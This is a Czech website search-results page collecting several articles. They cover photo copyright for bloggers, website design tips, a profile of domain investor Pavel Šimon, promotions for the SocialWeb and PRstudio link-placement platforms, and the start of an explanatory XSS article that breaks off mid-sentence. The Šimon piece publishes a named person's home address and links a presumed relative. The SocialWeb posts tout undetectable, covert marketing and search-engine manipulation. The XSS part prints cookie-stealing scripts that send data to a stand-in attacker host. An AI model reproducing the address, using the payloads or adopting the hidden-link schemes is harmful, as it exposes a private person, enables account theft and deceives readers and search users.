Výsledky vyhledávání v sekci Webové stránky na dotaz zdroj příjmu

Etiketa blogování: jak používat fotografie na vašem blogu

access_time13.květen 2019personJana

Dnes se dostáváme k  tématu, které trápí nejednoho blogera.  Kde vzít fotografie na můj blog?Blog bez fotografií může sice existovat, ale ve většině případů je alespoň jedna fotografie u každého příspěvku vhodná. Přitáhne oko čtenáře a může ho inspirovat v dalším čtení. Záleží samozřejmě na tom, v jakém oboru se pohybujete a o čem píšete. Některé blogy mají čistě literární charakter a obejdou se bez fotek. Pokud máte firemní blog, budete mít pravděpodobně zásobu fotografií z vlastních zdrojů, například fotky vašich produktů. Ne vždy to ale stačí.Používání fotografií se řídí autorským zákonem. Nemůžete tudíž jen tak zkopírovat kdejakou fotografii, kterou najdete na webu a použít je na svém blogu. Byla by to krádež a mohl by vám hrozit postih. Ale nebojte se, zas tak strašné to není… To by neexistoval jediný blog s fotkami. Jak to tedy zařídit, abychom měli blog plný inspirativních fotografií a neporušovali zákon?Máte několik možností:1. Používat vlastní fotografie. Nejjednodušší varianta, alespoň z pohledu zákona. Ne už tak z pohledu mnohdy nepříliš zdatného fotografa. Některé blogy (např. o jídle) přímo na vlastních fotografiích autorů staví. Záleží tedy opět na tom, o čem váš blog je a zda jsou fotografie, které budete publikovat, jen ilustrativní k textům, nebo to má být vaše vlastní tvorba a deviza vašeho blogu (na téma „základy fotografie pro blogery“ připravujeme seriál tady na blogu ve spolupráci s renomovaným fotografem)2. Pořídit fotografie z fotobanky. Není to zadarmo, ale ve fotobánkách – např.  http://www.pixmac.cznebo http://www.dreamstime.com  a spoustě dalších můžete zakoupit všechny možné fotografie a obrázky. Dobrá zpráva: lze najít v komerčních fotobankách i fotografie zdarma! Prohledejte různé fotobanky a uvidíte, co najdete. Na tomto blogu i v jiných projektech používám úžasnou fotobanku Stock Xchng - http://www.sxc.hu, kde jsou fotografie zdarma! Je jich tam opravdu velký výběr. Jen pozor, reklama je všude a tudíž v této fotobance se vám mohou objevit v horní  nebo dolní liště krásné fotografie, ale placené, většinou z fotobanky iStockphoto.com3. Používat fotografie jiných autorů. Vážně to jde, ale… Internet je plný fotografií, plný krásných blogů. Některé blogy (jako i např. můj blog http://idesignercz.blogspot.cz) jsou založeny na poskytování vizuální inspirace čtenářům prostřednictvím fotografií. Z pohledu zákona bychom správně v případě použití fotografie, kterou najdeme na internetu, měli požádat autora o povolení s publikováním. Obávám se ale, že to bychom nedělali nic jiného. Navíc ne vždy se vám podaří vlastně dohledat původního autora fotky, která putuje po internetu. Jak to tedy vyřešit? Pokud publikujete článek a uvedete fotografii, kterou jste našli na internetu resp. na jiném blogu, musíte vždy uvést jméno blogu  a/nebo autora a odkaz na jeho stránky. Odkaz na zdroj může být uveden přímo pod fotografií, nebo hromadně pro všechny fotky v článku na jeho konci.  Ale pozor!!! V tomto případě pracujete vlastně jako novinář  a používáte fotky tzv. k editorial účelu. Nemůžete zkopírovat někde celý článek včetně fotek a publikovat ho na svém blogu! Musí to být váš vlastní článek, ke kterému najdete ilustrační fotky z různých zdrojů (článek by měl mít také nějakou přidanou hodnotu pro vaše čtenáře a nemůžete tudíž kopírovat to, co už jinde bylo napsáno, nehledě na porušování autorského zákona). A je dobré dát si tu práci, a proklikat se z fotky, kterou najdete až k jejímu původnímu autorovi, někdy to nejde, ale pokud ano, uvádějte zdroj a odkaz na původního autora, nikoli na blog, který fotku převzal. A podívejte se, zda autor nemá na svých stránkách někde informaci, že si nepřeje používání svých fotografií jinde. Někdy naopak narazíte na informaci, že fotky používat můžete, pokud uvedete odkaz zpět na blog autora – tím lépe – autor získá malou „reklamu“ a vy máte jistotu, že jste udělali vše správně.A pozor podruhé:  takto získané fotografie nesmíte použít ke komerčním účelům! To znamená ani v grafice svého webu či blogu (záhlaví, ilustrace apod.) nebo ke své vlastní reklamě či propagaci a už vůbec ne k výrobě nějakých produktů! K takovému účelu musíte použít fotky z fotobank – viz bod 2.Jak ideálně takový příspěvek vypadá se můžete podívat třeba tady: http://idesignercz.blogspot.cz/2013/03/barevne-kombinace-seda-svezi-zelena.html – článek o určitém tématu, doplněný fotkami „posbíranými“ po internetu s uvedením odkazu na zdroj fotek.4. Fotobanky, které jsou zdarma. Například na Pixabay.com naleznete obrázky zdarma, které navíc mohou být použity i pro komerční použití!Na závěr prosím vemte na vědomí, že nejsem právník, tudíž tuto problematiku jsem se snažila popsat ze svého hlediska a svých zkušeností a podle svého nejlepšího svědomí, nicméně nepřebírám odpovědnost za jakékoli problémy, které by vám mohly s použitím fotografií vzniknout. Děkuji za pochopení :-).

folder_openPřiřazené štítky

Kvalitní fotografie na webu prodávají

access_time21.březen 2020personRedakce

Pokud si zřizujete webovou stránku, pak byste měli vědět, že nejen kvalitní obsah, ale i fotografie či obrázky prodávají. Návštěvníci Vašich webových stránek či e-shopu si nemohou zboží vzít do ruky a vyzkoušet si ho, a proto je nemůžete přesvědčit pro koupi díky hladkému povrchu výrobku. Je tedy potřeba zaujmout zákazníky právě kvalitními fotografiemi. Na e-shopu prodávají fotografie, obrázky, videa a samozřejmě texty, respektive popisky produktů. Vaši potenciální klienti jsou odkázání jen na obrazový materiál, který je jim poskytnut na Vaší webové stránce. Efektivní je připojit také recenze výrobků, díky čemuž bude jeho prezentace zajímavější. Dnes se však zaměříme na fotografie a obrázky, které lidi musí přesvědčit, aby si u Vás nakoupili zboží či objednali služby.Jaké fotografie mít na svém webuTvorba webových stránek zahrnuje samozřejmě webdesign, validní kód a hlavně kvalitní obsah. Internetové stránky by měly být v každém případě obohaceny výstižnými fotografiemi. Je lepší, pokud je k produktu zobrazeno více fotografií, klidně pět či deset. Můžete produkt nafotit z různých úhlů pohledu či uděláte záběr na detail produktu. Fotografie musí být ale KVALITNÍ. Máme tím na mysli jejich ostrost a barevnou vyváženost. Fotografie lépe působí, když je pozadí za produktem bílé, aby působily uceleně. U některých výrobků je těžko představitelná velikost, a proto je někdy dobré přirovnat ji ke krabičce zápalek, sirce či dítěti. Otázkou však ještě zůstává, kdo fotografie pořídí. Obrátíte se na profesionálního fotografa, který se zabývá specifickým stylem fotografie anebo si fotky nafotíte sami? Investice do kvalitních fotografií se Vám rychle vrátí. Tvorba internetových stránek vyžaduje mnoho investicí a fotografie jsou jednou z nich.Úprava fotografiíNež však fotografie vložíte na svou internetovou stránku, je potřeba je mnohdy upravit. Fotografie by měly mít optimální rozměry pro prohlížení či stejnou velikost, aby na stránce působily jednotně. Některé redakční systémy samy fotografie nepřizpůsobí do textu, a proto byste měly volit takovou velikost, která se na danou stránku hodí. Fotografie můžete vkládat jednak do samotného textu popisující produkt, jednak můžete vytvořit fotogalerii. To pak záleží pouze na Vás.Kde vzít zdarma kvalitní obrázky pro vaši webovou stránku?Zkuste třeba Pixabay.com, v současné době asi nejlepší zdroj pro zdarma obrázky.

folder_openPřiřazené štítky

Kritéria pro kvalitní webovou stránku

access_time21.březen 2020personRedakce

Asi každý obyčejný uživatel internetu si těžko představí, jak doopravdy pracuje kvalitní webová stránka. Nemá tušení, jaká je správná struktura, jak pracují odkazy a co je na internetové stránce nejpodstatnější. První, co uživatel uvidí, tedy co hodnotí, je vzhled stránky. Ale to není vše, co musí splňovat webová stránka. Je potřeba se při její tvorbě zaměřit zejména na uživatele.Barva pozadí a textuNejpodstatnější na internetových stránkách jsou informace, proto Vaši klienti či uživatelé musí najít potřebné informace rychle. Je třeba hned zezačátku si promyslet barvy, které budou použitelné na stránce. Asi sami víte, že na zelené pozadí se černá barva moc nehodí, ale i přesto tuto kombinaci hodně designerů volí. Neideálnější je výběr barev podle tematiky. V případě, že máte buissnes web, tak volte čisté barvy, nejlépe bílé pozadí s černým textem. Máte-li kadeřnictví, vybírejte barvy dle designu Vašeho kadeřnictví, nejlépe například fialovou, bílou a černou. Neexperimentujte s černou barvou. Černá barva je dost specifická a ne každý grafik ji zvládne dosadit tam, kam skutečně patří.Lehce čitelný textPokud chcete na své stránky přidávat novinky či máte blog, který neustále aktualizujete, nezapomínejte, že všechny články by měly být lehce čitelné. Nikdy na stránkách nepoužívejte vulgární výrazy, protože mohou dost ovlivnit Vaše uživatele, on by pak Vaši stránku zavřel. Vybírejte čitelné slovní spojení, které je srozumitelné pro obyčejného člověka. I když píšete pouze pro úzkou skupinu lidí, může se stát, že na Vaši stránku přijde nováček, který se chce s daným tématem seznámit, ale nesrozumitelná slova ho odradí.Nepoužívejte banneryAno, internetová stránka slouží většinou jako zdroj přivýdělku. Ale mnohdy kvůli pár tisícům za měsíc za banner přijdete o nové klienty, kterým banner vadí a ruší tak zkoumání informací. V dnešní době se jen těžko najde webová stránka, která by neměla banner. Pokud však chcete mít na svých stránkách banner, měl by být krásný a neotravný. Tvořte grafiku s místem pro banner tak, aby do něj zapadal.Skryté části na stránkách a JavaScriptPoužívejte jen s mírou pluginy, které jsou volně stažitelné na internetu. Mnohokrát se stává, že se domníváte, že přidáte třešničku na dort, ale přitom ublížíte sami sobě a hlavně Vaší internetové stránce. Hodně pluginů není dost propracovaných a mohou být jen na škodu. V případě, že chcete přidat nějakou inovaci, přenechejte tuto práci profesionálům, abyste předešli jakýmkoliv problémům.Navigace na webové stránceNavigace neboli menu je nejpodstatnější částí na internetové stránce. Chcete-li, aby uživatel po Vaší internetové stránce brouzdil, umožněte mu to bez problémů. Nenechejte uživatele hledat a přemýšlet, kam má kliknout, aby přešel dál. Vymyslete logickou navigaci, která bude pro každého srozumitelná. Používejte hlavní navigaci a vedlejší, aby nenastala situace, že všechny své stránky budete sjednocovat do jedné.Jeden tematický webMnohdy lidé, kteří vlastní internetové stránky, na něj dávají všelijaké informace, které k sobě ani nepatří. Na stránkách, na nichž se nachází vše, pak není možné nic najít. Držte se hlavní kategorie a rozvádějte je maximálně na podkategorie.Zaujměte obsahemObsah, který zaujme, vyhrává. Uživatel, který najde na stránkách co nejvíce zajímavé texty, na Vašich stránkách zůstane. Mnohdy se stává, že webmaster ví, že by měl svou stránku neustále rozvíjet, ale neví jakým způsobem. Pak tedy začne psát nesmyslné články, které nikdo nevyhledává, tedy ani nečte. Pokud nemáte nadání psát zajímavé texty, nabízíme Vám kurz copywritingu, na němž se naučíte nejen psát pro web, ale i pochopit hlavní marketingové způsoby.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci SEO a vyhledávače na dotaz zdroj příjmu

I ajťáci raději konspirují, aneb kdo je Pavel Šimon

access_time13.květen 2019personRedakce

Když už jsme u toho, Pavel Šimon je pro většinu IT společnosti pohybující se v otázkách internetového bussinessu obyčejný sprostý spekulant a pro některé i zloděj . Jeho profil investora je docela zajímavý.Pavel Šimon je nejznámější doménový investor, chcete-li spekulant, u nás. Jeho postava je obestřena rouškou tajemství. Někteří tvrdí, že je to jen smyšlená postava, někdo zase, že je to alias Fandora, ať tak či onak, jedná se pravděpodobně o držitele jednoho z nejcennějších portfolií v České republice.Pavel Šimon začal s doménami brzy, řekl bych někdy v roce 2001 a velice rychle si získal pozornost. Díky tehdejším pravidlům bylo možné si registrovat domény a zaplatit je až později ve lhůtě 2,5 měsíce, tímto způsobem šlo zaregistrovat neomezený počat domén, pokud doména nebyla uhrazena tak propadla a byla znovu volná, Pavel Šimon již tehdy používal skript na odchytávání, takže doména byla volná jen několik sekund po té znovu registrována na 2,5 měsíce zdarma. Tímto blokoval tisíce domén. Získal tím značnou mediální pozornost, nutno dodat, že tento obchodní model budil značnou kontroverzi, na druhou stranu jeho činnost nebyla nelegální (prostě chyba systému) a nebyl jediný kdo to takto praktikoval.Změna stavu přišla až na konci roku 2003, v této době bych řekl, že už měl vytvořený dostatečný kapitál na to, aby si mohl dovolit držet větší počet domén (připomínám, že v roce 2000 stála registrace domény 1600 Kč a prodlužovaní poplatek pak 800 Kč na rok, udržování i malého portfolia bylo značně nákladné). Pavel Šimon nepřestal být aktivní ani po této době, svědčí o tom například ThajskeMaseze.cz z roku 2007 nebo nákup domény Vtipy.cz od OCT Network (doména vtipy.cz odchytnul). Jeho tisícové portfolio obsahuje také překlepové a trademark domény, paradoxně, ale tyto domény nejsou parkovány, takže úplně nevidím smysl v jejich držení, vlastně žádná adresa v jeho portfoliu není parkována (ani ty generické), čímž se hrubým odhadem připravuje asi o 50 000+ Kč měsíčně (Webtržníci hovoří i o 100 000 + Kč).Jeho investiční model se nedá napodobit, protože je založen na brzkém vstupu do odvětví a uvědomení si ceny těchto virtuálních realit v době, kdy tomu věřilo jen málo lidí. Pan Šimon je stále aktivním, přihazuje na Daukci (koupil tam například InzertWeb.cz). Jedna z jeho neúspěšných investic je nákup CR domén o kterých se mluvilo na Webtrhu, investice v hrubé výši 150 000 Kč do nejlepších českých slov na Kostarické koncovce CR se však ukázala jako chybná a v současnosti jsou všechny tyto domény volné.Je mi trochu líto, že Pavel Šimon nevystupuje veřejně, neboť informace o jeho doménových prodejích budou stát určitě za to, jediný zaznamenaný prodej, o kterém vím je Sazeni.cz (zdroj: Fandor). Na závěr snad jen říci, že jméno Pavel Šimon hodně lidí leží v žaludku, ovšem většině z nich jen proto, že do doménového světa přišli pozdě a on jim doménu nechtěl prodat levně, co se týče té menšiny, kde vyfoukl jméno firmě po nechtěné expiraci nebo zaregistroval trademark, tak „Kdo jest z vás bez hříchu, nejprv hoď na ni kamenem“ a my všichni musíme na sobě pracovat, aby byl doménový svět lepší (mě nevyjímaje).POZN: Ani po dvou snahách získat komentář k článku p. Šimon neodpověděl. V článku mohou být faktické chyby, neboť jsem v odvětví jen 2 roky, takže prosím o případné upozornění. Začal včas s doménami, a tak začal zabrat lukrativní domény jako brana .cz , hacking. cz , vtipy .cz , zelezarstvi .cz atd. Vzhledem k jeho tajemnosti začala spousta lidí spekulovat, jestli tento člověk vůbec existuje. A tyto spekulace se začaly vířit tak hlasitě, jak bych to od IT komunity která by měla být zvyklá si všechno ověřovat nečekal.Jak najít kdo je Pavel Šimon totiž bylo snadné a určitě to není výkon, za který bych si zasloužil nějak dlouhý potlesk. Boreček tedy rozhodně nejsem. Budu zde v článku pracovat přímo s konkrétními údaji, rozhodně ale nechci abyste je nějak zneužili, kdo je ale psychopat už by si je stejně našel sám .Jako první při hledání Pavla Šimona sem se podíval na registr domén a vyzkoušel jednu z domén jeho portfolia. Okamžitě jsem se dozvěděl jeho adresu, která zní Nevanova 1059, 163 00, Praha. Protože jsem chtěl vědět jestli je adresa pravá, použil jsem mapy. A na mapě už se mi rovnou objevil jeho dům. Ano, skutečně existuje, a ve firmách na příslušné adrese se mi dokonce objevil jakýsi David Šimon který dělá alarmy. Jen sem si říkal, že když je příbuzný s Pavlem Šimonem, určitě má doménu alarmy .cz – a fakt! Ještě sem Davida ověřil v živnostenském rejstříku a zjistil, že opravdu tedy existuje i zde. Ještě sem v něm ověřil i Pavla.Tak vidíte, nebyla to akce hodná akce Jamese Bonda a další konspirační teorie byla odstraněna .

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci SocialWeb na dotaz zdroj příjmu

Jak a proč jsem vytvořil SocialWeb.cz a PRstudio.cz

access_time25.duben 2019personRedakce

Položili jste si někdy otázku, jak za co nejméně peněz propagovat novou službu, webovou stránku a nebo třeba internetový obchod?Asi si řeknete reklamou, jenže reklamou získáte dočasný zájem o produkt a nebo službu, aby jste tuto návštěvnost udrželi, bude váš business vlastně na reklamě závislí a vám tak nezbude, než neustále zlepšovat svou strategii, cílení a obsah takového reklamního sdělení a vlastně se také budete muset smířit s tím, že velkou část vašeho zisku budete průběžně vyplácet poskytovatelům těchto reklam, například Google a nebo Facebooku.Neříkám, reklama může být zdrojem nových zákazníků, nicméně já bych marketingový model stavěl trochu jinak.Mě vždy nejvíce zajímalo to, jak se dostanu do výsledků vyhledávání na konkrétní klíčová slova na první místa, například v Google a nebo Seznamu, hned pod ty, kteří za to aby na prvním místě byli platí.Protože je to zdarma a je to trvalé.Dříve existovala spousta technik jak to zajistit, například jste do komentářů na různých webech vkládali URL adresy vašeho webu což byl vlastně SPAM, pak jste mohli přidávat PR články do webů, kde je přidávali také všichni ostatní, které vlastně nikdo kromě robotů nečetl a desítky dalších technik – díky kterým si roboti vyhledávačů, mysleli, že se o vašem webu píše a váš web je populární, proto vás řadili na přední místa.Priorita Google a dalších vyhledávačů je však pro hledaný dotaz nabídnout co možná nejrelevantnější výsledek, což jak jistě chápete se o webech, které se na první místa dostali díky těmto technikám říci nedalo, proto Google a další upravovali své algoritmy tak, aby tyto techniky prodejnímu webu na místo pomoci, uškodili (penalizovali) – proto je tohle dávno minulost a nic z toho již nefunguje.Aby jste se v dnešní době dostali na první místa ve vyhledávání, podle mě existuje jen jeden i do budoucna funkční způsob jak to zařídit.Publikovat články na různé weby a magazíny, které jsou navštěvované a které obsahují tématické články, zkrátka nevykazují žádné známky toho, že na těchto webech dochází k publikaci třeba i jen publikaci PR článků za peníze a mezi tyto tématické články infiltrujete váš článek, který však musí být unikátní a měl by být blízký tématům vámi vybraného webu.Pak existuje druhý způsob a to ten, že každý z článků na těchto tématických webech obsahuje mnoho klíčových slov, mezi nimi i právě ty, které vás zajímají, nebylo by tak krásné tyto klíčová slova, na která se chcete dostat ve vyhledávání nahradit ahref zpětným odkazem na váš produkt a nebo službu? A tak robotům vyhledávačů a vlastně i čtenářům dát najevo, že se v článku píše právě o vašem produktu a nebo službě?Možná se mnou souhlasíte, pokud ano, pak nastává otázka jak to zrealizovat, na internetu existují miliony webů, jak najdete ten správný web, jak oslovíte majitele toho webu, jak s ním budete vyjednávat cenu, jak mu budete fakturovat….?Před dvěma lety jsem si tyhle otázky sám položil, sám bych preferoval, když bych s novým produktem nebo internetovým obchodem tuto formu propagace mohl využít, nicméně v té době žádný jiný způsob, než skutečně kontaktovat majitele webů nebyl a to si myslím, že je stejné i dnes.Rozhodl jsem se tedy, že místo vytváření internetového obchodu a nebo jiných aktivit (protože jsem tenkrát přemýšlel co budu dělat) vytvořím aplikaci, která právě tyhle věci bude umět řešit a to jsem udělal, vytvořil jsem marketingový nástroj https://Prstudio.cz, tento systém tak nyní dokáže nahrazovat klíčová slova v článcích zpětnými odkazy, umí vkládat PR články do desítek webových stránek a magazínů, také umí vkládat SEO komentáře do těchto webů – zkrátka všechno co bych si dříve býval přál.Problém však nebyl vytvořit takový marketingový nástroj, skutečný problém byli ty samotné webové stránky, do kterých by tento marketingový nástroj mohl lidem, jenž o takové služby budou mít zájem umožnil publikovat.Aby to tedy bylo možné, samozřejmě první jsem si nainstaloval WordPress a přemýšlel jsem jak to propojím a nebo zrealizuji, taky jsem trochu experimentoval s Drupalem i Joomlou, nicméně ani jedno z těchto řešení nebylo pro můj plán vhodné, mohl bych jmenovat desítky důvodů proč ne, ten hlavní však byl ten, že jsem si uvědomoval, že sám budu muset vytvořit desítky takových webů a nedokázal jsem si představit, že každý budu muset složitě instalovat, nainstalovat pluginy, nainstalovat šablonu.. to bych snad ještě zvládl, jenže když jsem si představil (zejména kvůli množství), co všechno mě čeká, když budu potřebovat nějakou novou funkci, když budu chtít publikovat článek a nebo, když budu muset něco upravit… no zkrátka, než abych tohle dělal, tak bych to nakonec ignoroval, weby by zůstali neudržované, bez nového obsahu a já bych vlastně byl tam kde jsem začal.Z tohoto důvodu jsem tehdy začal pracovat na systému, který by splňoval všechny mé požadavky, podotýkám, že v této době jsem neřešil myšlenku, že by tento systém mohl používat i někdo jiný.Toto první řešení fungovalo na vždy dvou databázích, tedy ta první byla toho konkrétního webu a ta druhá byla databáze systému, proto aby to fungovalo z části jako jeden celek, takhle jsem vlastně vytvořil asi dva weby, pak jsem si uvědomil, že mě ani tohle nebaví, zjistil jsem hlavně také to, že bych potřeboval další lidi, kteří by mi pomáhali tyto weby vytvářet a stávající řešení, kdy ve zdrojovém kódu byli přístupy do obou databází znamenalo, že bych nikoho nemohl nechat upravovat zdrojový kód jeho konkrétního webu, takže i když myšlenka byla dobrá, technicky to bylo špatně.Tehdy jsem začal od začátku, na jehož konci (po asi 2 kompletních přepsáních a asi 200 aktualizacích) je dnes systém https://SocialWeb.cz, ten se však po asi roce a půl každodenního fulltime vývoje změnil ze systému, který měl jeden úkol a to rychle vytvářet tématické weby k systému, který je plnohodnotný a všestranný, který dokáže kromě publikací na weby publikovat i do sociálních stránek, vytvářet mobilní aplikace, předregistrovat domény, procházet volné expirované domény… a stovky dalších funkcí, které mají za cíl, každého kdo tento systém začne používat posunout daleko před ostatní, kteří mají podobný plán ale rozhodli se ho realizovat za pomocí opensource řešení, třeba díky WordPressu.SocialWeb je dnes velmi výkoný nástroj pro tvorbu a správu digitálního obsahu s napojením na Prstudio.cz a nebo Adclick.cz, které těmto webům automaticky zajišťují monetizaci.To hlavní ale zůstalo, každý může vytvářet neomezené množství webových stránek včetně webhostingu, který je také 100% zdarma.Jediná věc, která se platí je členský příspěvek 350 Kč za měsíc, který je však odečítán z příjmů, které vám díky systému Adclick.cz a Prstudio.cz systém SocialWeb.cz automaticky přičítá do zůstatku na SocialWeb účtu.Na závěr bych ještě asi zmínil, že bez jakékoliv reklamy je k dnešnímu dni v aplikaci Prstudio.cz zaregistrováno 43 lidí, tito lidé jsou z většiny marketingový specialisté, možná majitelé marketingových firem, to co nemám je tedy nouze o poptávku mnou nabízených marketingových služeb.Ve skutečnosti je nyní mým problémem to, že slibuji publikaci do stovek webů a mám jich nyní asi 30, proto jsem zatím žádnému registrovanému uživateli v Prstudiu.cz neumožnil dosud přihlášení, mám zkrátka příliš málo webů a sám je nejsem schopný tvořit dostatečně rychle a to třeba i proto, že mým úkolem je celý systém SocialWeb neustále vylepšovat, vytvářet nové nástroje a funkce.Proto jsem se rozhodl, že prvním 20ti lidem, kteří se rozhodnou do SocialWebu zaregistrovat dám členství na první rok úplně zdarma.Ještě před tím, než se rozhodnete do systému SocialWeb vstoupit, se však podívejte na tyto videa, která mají 4 hodiny a kde se pokusím alespoň trochu popsat základní funkce systému SocialWeb. 1. Podívejte se na video o tom co je SocialWeb2. Podívejte se na video jak v systému SocialWeb zaregistrujete doménu a vytvoříte webhosting3. Podívejte se na video jak v systému SocialWeb vytvoříte webovou stránku4. Podívejte se na video jak do webové stránky a na sociální sítě můžete publikovat články5. Podívejte se na video jak pracovat s moduly, jak upravit homepage (úvodní stránky webů) Není paráda, že vida z webu iPřednášky.cz je díky embed kódu možné vkládat i do úplně jiných webů?I toto jsou funkce, které https://socialweb.cz obsahuje.

folder_openPřiřazené štítky

Jak vydělávat na internetu se systémem SocialWeb

access_time25.duben 2019personRedakce

Před týdnem jsem se přidal do několika Facebook skupin na téma Práce online, vydělávání z domu a tak podobně.Od té doby se mi na Facebooku zobrazuje mnoho nabídek na téma jak vydělávat z domu a vlastně ani u jedné z nich jsem si skutečně nedokázal představit, že bych takhle mohl vydělávat.Je tomu dva roky, kdy jsem se rozhodl nebýt zaměstnaný jako programátor webových aplikací a dnes jsem autorem unikátního systému, který se jmenuje SocialWeb a k němu přiřazených marketingových aplikací jako PRstudio a nebo Adclick, tyhle systémy mají jeden cíl, chtějí skutečně zrealizovat vydělávání na internetu každému.Moje práce spočívala v tom, vymyslet způsoby, funkce a nástroje, díky kterým každý jedinec bez předešlých znalostí a zkušeností ze světa IT dokáže dělat věci lépe, než ostatní, kteří se spoléhají na různé programátory a agentury, díky tomu otevírám všem úplně novou dimenzi pro jakékoliv jejich aktivity.Ne, bez práce to nebude.Vaším úkolem by mělo být se zaměřit na nějaké odvětví, kterému i třeba rozumíte a následně vytvořit několik webových stránek díky systému SocialWeb na vámi vybrané téma ‚niche‘.Následně by jste měli vytvářet sociální stránky a skupiny na konkrétní a příbuzná témata vámi vybraného ‚niche‘.Tím si budete budovat vliv a pokud si vytvoříte vliv v konkrétním oboru a nebo odvětví, pak je velmi jednoduché tento vliv obracet v profit - ze jména od těch, kteří si ve vámi vybraném oboru a nebo odvětví konkurují a ti pak mohou využívat marketingové nástroje - třeba  Prstudio.cz, díky kterému na vašem webu vytvořeném přes systém SocialWeb budou moct publikovat tzv. PR články - ze kterých získáváte profit 70%.Tohle však ani zdaleka není jediný způsob jak na základě webových stránek můžete vydělávat peníze, můžete využívat další marketingové nástroje, například affiliate marketing, publikování reklam a nespočet dalších možností, které se vám jako majiteli webové stránky a správci skupin a facebook stránek s vlivem otevřou - a pak pokud tohole dokážete, můžete zvážit publikaci i těch nabídek, které stejně jako já v různých Facebook skupinách na téma vydělávání online vídáte.Co tedy vlastně já dělám a čeho můžete být součástí?Já jsem autorem systému, který umožňuje zapojeným lidem vytvářet webové sítě, mobilní aplikace, webové stránky, spravovat sociální stránky.. jedná se o komunitu lidí, která tvoří a navzájem si pomáhá - j za účelem zisku.Hlavním cílem je budovat vliv, díky kterému můžeme firmám a nebo i třeba marketingovým agenturám pomáhat ovlivňovat společnost a nebo ovlivňovat vyhledávaše jako je Google a Seznam. Reklamy a přímí marketing jsou dle mě již neefektivní, budujeme úplně nový druh marketingu, skrytý, nedekovatelný a právě o to víc agrasivní - za který jsou nejen marketingové firmy ochotné platit velké peníze a který dosud ani v minulosti neexistoval..Ale to neznamená, že své weby vytvořené systémem SocialWeb nemůžete používat pro své vlastní aktivity a že se musíte zapojit do marketingových aplikací jako je PRstudio.cz.Jaké jsou možnosti růstu?Můžete mít třeba tisíc webů, na různá témata, spravovat stovky sociálních sítí, zaměstnávat vlastní copywritery a nebo to samé můžete dělat v jakékoliv jiné zemi, protože SocialWeb je kompletně multijazyčný. Jaké jsou požadavky pro to abych mohl začít?-Musíte vlastnit domény a nebo mít peníze k tomu aby jste si nějaké mohli zaregistrovat (socialweb vám pomůže najít skvělé volné domény)-Musíte si vymyslet téma, niche ve kterém se chcete angažovat-Musíte se podívat na videa, ve kterých vysvětluji základní fungování systému SocialWeb a pochopit o čem mluvím-Musíte být gramaticky schopný – tedy umět psát články a nebo umět překládat články ze zahraničních webů. Podívejte se na mnou vytvořené videa:1. Podívejte se na video o tom co je SocialWeb2. Podívejte se na video jak v systému SocialWeb zaregistrujete doménu a vytvoříte webhosting3. Podívejte se na video jak v systému SocialWeb vytvoříte webovou stránku4. Podívejte se na video jak do webové stránky a na sociální sítě můžete publikovat články5. Podívejte se na video jak pracovat s moduly, jak upravit homepage (úvodní stránky webů)  

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Hacking na dotaz zdroj příjmu

Pokročilé techniky xss (cross-site scripting)

access_time16.červen 2020personRedakce

Popis pokročilého Cross-Site-Scriptingu, se vzdálenou kontrolou v reálném čase, od autora aplikace XSS-proxy jménem Anton Rager. Cross Site Scripting (XSS) je mnoha vývojáři a security profesionály obvykle považován za málo závažnou bezpečnostní zranitelnost. Do dnešní doby vznikla řada projektů s poukazem na potencionální rizika XSS, ale problém je převažne na pokraji zájmu bezpečnostních expertů a to včetně širších souvislostí o které tady jde.Autor aplikace XSS proxy napsal a zveřejnil popis v naději, že se odlehčený pohled na věc změní. Cituji: Doufám, že tímto dokumentem a vydáním nástroje pod jménem XSS-proxy (popsáno níže) změním pohled na celou situaci. XSS-Proxy umožňuje plnou kontrolu XSS útoků vzdáleným uživatelem (útočníkem). Tento dokument popisuje obvyklé XSS útoky a představuje nové metody/nástroje pro vytváření interaktivních XSS útoků, obojsměrných útoků a ještě více zla.Nejedná se o detailní návod (XSS howto), ale o širší vysvětlení metod XSS útoků. CGISecurity XSS FAQ (1) je dobrý zdroj pro celkový pohled na problematiku hlavních XSS zranitelností. V závěru textu jsou reference (2,3,4,5) obsahujíci skvělý materiál pro navazujíci XSS témata.Projekt XSS-proxy nevznikl jako platforma pro diskuzi a řešení. Existuje celá řada zdrojů, metod a možností pro hlášení chyb nebo opravování XSS děr. Pokročilé metody XSS které budou v textu představeny obcházejí mnoho metod aplikovaných proti XSS zranitelnostem. Doporučené čtení o hidden form inputs, URL re-writing, POST methods častokrát podsouvají řešení které nejsou 100% učinné, obzvlásť v případě, že má útočník přístup ke stejnému obsahu (a jscript/values) jako jeho oběť. Zbavit se všech speciálních HTML znaků nebo precizní filtrování vstupu je k ničemu v případě, že existuje neobjevený způsob jak vstup obelstít. Řešením může být rozdelení webových stránek na četné dokumentové domény, kde bude pro útočníka mnohem obtížnější provést/najít XSS útok/zranitelnost v porovnání s jediným místem kde je vše pohromadě. CGI vyhledávání na stránce v jedné subdoméně a citlivé oblasti na další(ch) může být užitečné.Pozadí XSSJako mnoho z vás ví, běžné XSS útoky vycházejí typicky ze dvou základních principů:1 – Útočník uploaduje <script> tag do veřejného fóra, blogu nebo stránek které navštevují uživatelé a obsahují XSS zranitelnost. Útočník pak díky přístupu získa (harvesting cookies) cookies webové stránky ze kterých vyčte řadu důležitých informací a díky tomu častokrát i přítpup k uživatelským účtum. Útoky jsou ale někdy využitelné mnohem hlouběji. Zde je to co myslím a říkam mnoha lidem co XSS přesně znamená. Příklad:Někdo chce odeslat následujíci kód na utocnik.com aby to další uživatelé sprocesovali.<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>Je to pokus o získání obrázku ze serveru útočníka pomocí cookies uživatele blogu priklad.com v URL.2 – Útočník použije veřejný web náchylný na útok XSS jak bylo uvedeno nahoře, nebo email zprávu založenu na XSS pro přesměrování uživatele na druhý server zranitelný pomocí XSS. Druhý server je aktuální cíl útočníka a stránka samozřejme obsahuje vlastní XSS zranitelnost, kde nic netušíci uživatel injektuje obsah <script> do dokumentu, který navenek pouze vidí. To v kombinaci s přesměrováním z dalšího webu umožňuje podvržení cookies, podvržení form/submit obsahu nebo specifickou akci XSSnutého uživatele proti dalšímu webu. Tato metoda je hodně rozšířena ale pramálo admiínistrátorů chápe, že se jedná o způsob útoku. Jak to funguje?Někdo chce odeslat následujíci kód na priklad.com aby to další uživatelé sprocesovali. <script>document.location=’http://ebanking.com/search?name=<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>'</script>Moment kdy je uživatel přesměrován na ebanking.com s 